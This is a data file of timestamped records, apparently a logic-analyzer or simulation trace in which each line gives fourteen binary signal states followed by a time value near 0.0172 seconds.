0,1,0,0,1,0,0,0,0,1,0,0,0,0,1.7152100e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7152104e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7152124e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7152148e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7152172e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7152196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152204e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152348e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152424e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152448e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152476e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152500e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7152504e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7152548e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7152572e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152580e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152624e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152648e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152772e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152824e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152848e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7152972e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7152996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153048e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153224e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153228e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7153248e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153276e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7153300e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153332e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153572e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153580e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7153624e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153656e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153700e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153796e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153824e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153848e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153852e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7153900e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7153924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153932e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7153972e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7153996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154048e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154224e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154248e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154372e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154396e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154424e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154448e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154572e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154624e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154648e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154772e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154824e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154848e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7154972e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7154996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155048e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155224e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155248e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155396e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7155424e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7155448e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7155476e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7279972e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7280180e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,1.7280204e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7280228e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,1.7280556e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7280580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7280588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7280604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7280628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7280652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7280680e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7280704e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7280732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.7280756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.7280780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7280804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7280828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7280852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7280876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7280904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7280928e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7280956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7280980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281028e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281036e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7281080e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281104e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281112e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281156e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281252e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281260e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7281304e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281332e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281504e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281528e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281652e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281660e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7281704e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281732e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,1.7281736e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281740e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7281904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7281928e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7281932e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7281980e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282012e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282052e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282104e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282108e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7282156e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282328e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282504e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282532e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282704e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282728e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282732e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7282780e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282812e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282852e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282860e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7282904e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7282932e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,1.7282936e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282940e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7282956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7282980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283104e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283128e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7283132e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7283180e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7283204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283212e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283252e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283304e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283328e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283356e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283504e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283528e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283704e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283728e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7283756e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7283804e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7283828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283836e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283928e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7283956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7283980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284052e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284080e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284104e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284128e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7284156e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7284180e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7284204e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7284228e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7284252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284260e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284428e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7284436e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7284480e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7284504e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284512e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284704e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7284952e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7284976e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285228e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285252e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285300e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285308e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7285324e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285352e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7285376e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285408e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285524e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285532e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7285580e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285604e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,1.7285608e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285612e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285700e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285752e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285776e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285804e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.7285852e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7285876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7285952e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7285976e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286152e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286176e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286352e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286504e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286532e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286632e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286656e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286832e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286856e-02 